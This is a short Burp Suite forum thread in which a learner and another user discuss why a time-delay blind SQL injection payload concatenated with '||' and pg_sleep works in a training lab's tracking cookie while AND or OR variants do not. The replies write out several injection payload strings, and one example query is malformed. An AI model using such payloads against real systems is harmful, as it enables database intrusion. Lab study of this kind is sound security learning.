Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Blind SQLi using Time delays

Ahmed | Last updated: Nov 27, 2021 12:41PM UTC

Hi there! I was solving the lab where trackingID cookie is vulnerable to blind sql injection and one has to cause time delay of 10 secs. My question is this why do we have to concatenate our payload '|| (SELECT pg_sleep(10))-- and it works but when we try AND operator 'AND Select pg_sleep(10)-- it doesnot work. Thanks in Advance. Ahmed

Mauro | Last updated: Nov 28, 2021 05:32PM UTC

Hey Ahmed, I'm not an expert on the topic, but I think you're maybe mixing string concatenation with OR operator. So for example, queries: Fq6z9xEpntIshzQz' OR (SELECT pg_sleep(5))-- Fq6z9xEpntIshzQz' AND (SELECT pg_sleep(5))-- are not working examples, where: Fq6z9xEpntIshzQz' || pg_sleep(5)-- does work. -- Basically, it might help you if you try to understand the way query is constructed. Assuming the query is constructed like this: SELECT tracking_id FROM user WHERE tracking_id = 'Fq6z9xEpntIshzQz' AND (SELECT pg_sleep(5))--; then, it is not a valid query, but: SELECT tracking_id FROM 'Fq6z9xEpntIshzQz' || pg_sleep(10)--; is. Hope that helps a little.

Ahmed | Last updated: Nov 29, 2021 07:54AM UTC

Yes, actually i think that the tracking_id='FqasfgtRftyEz' is passing as a string so we have to concatenate our payload rather than using AND or OR operator. This is what i understood from my research on this.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.